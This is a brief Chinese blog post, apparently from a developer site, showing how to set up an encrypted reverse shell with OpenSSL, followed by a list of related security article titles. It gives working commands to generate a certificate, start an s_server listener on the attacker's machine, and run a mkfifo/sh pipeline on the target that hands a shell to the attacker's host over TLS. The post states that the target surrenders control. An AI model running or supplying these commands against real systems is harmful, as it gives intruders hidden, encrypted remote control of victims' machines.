使用OpenSSL的反弹shell

1、攻击机生成证书:

powershell 复制代码
 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

2、攻击机开启服务

powershell 复制代码
openssl s_server -quiet -key key.pem -cert cert.pem -port 80

3、靶机连接命令

powershell 复制代码
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect X.X.X.X:80 > /tmp/s; rm /tmp/s

4、实现效果

攻击机可进行命令执行

靶机交出控制权

其他反弹shell命令

参见我的其他文章

相关推荐
jenchoi41320 小时前
【2025-11-22】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全·npm
中科固源1 天前
中科数测研究院亮相东京CodeBlue大会,揭秘医疗影像系统安全漏洞
网络·安全·网络安全
半个西瓜.2 天前
车联网NFC测试:NFC信号嗅探测试.
网络·安全·网络安全·车载系统
一起学安全技术2 天前
C11期作业27(09.27)
网络安全
YongCheng_Liang2 天前
Kali Linux TCP 泛洪攻击实验教程与防御方案(仅限合法测试场景)
运维·网络·网络安全
苦瓜炒蛋挞3 天前
小迪安全第二十二天-安全开发-PHP应用&数据库操作&留言板功能&第三方插件
数据库·网络安全·php·小迪安全
WayneJoon.H3 天前
Java反序列化 CC7链分析
java·安全·网络安全·cc链·反序列化
三七吃山漆3 天前
攻防世界——easy_web
安全·网络安全·web·ctf
Whoami!3 天前
⸢ 拾陆-Ⅵ⸥⤳ 安全数智化建设:安全智能平台(下)▸场景
网络安全·信息安全·智能安全